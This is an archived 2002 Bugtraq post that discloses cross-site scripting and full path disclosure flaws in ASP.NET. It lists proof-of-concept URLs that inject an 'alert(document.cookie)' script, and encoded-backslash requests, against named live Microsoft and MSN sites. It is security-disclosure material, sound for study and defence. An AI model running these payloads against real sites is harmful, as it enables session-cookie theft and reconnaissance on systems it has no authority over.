|
Bugtraq
mailing list archives
Microsoft .NET faults
From: "Johannes Westerink" <jwesterink () daxis nl>
Date: Mon, 4 Feb 2002 22:40:31 +0100
Microsoft ASP.NET Cross Site Scripting and Full Path Disclosure vulnerability
This is based on Microsoft .NET.
Examples how it can be exploited:
Cross Site Scripting:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://ulogin.bcentral.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://www.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://my.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://dotnet.microsoft.com/<script>alert(document.cookie)</script>.aspx
http://terraserver.microsoft.net/<script>alert(document.cookie)</script>.aspx
http://support.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://office.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://communities.microsoft.com/~/<script>alert(document.cookie)</script>.aspx
http://uddi.microsoft.com/~/<script>alert(document.cookie)</script>.aspx
This vulnerability exists on older .NET versions:
Full Path Disclosure vulnerability:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://terraserver.microsoft.com/a%5c.aspx
http://uddi.microsoft.com/a%5c.aspx
I've posted via Microsoft security subscribe website that there is a vulnerability and how to exploit on one of their
site long times ago (1/2 year ago), and haven't got any response of them.
-- Johannes Westerink
 By Date 
By Thread
Current thread:
- Microsoft .NET faults Johannes Westerink (Feb 04)
| 
Intro
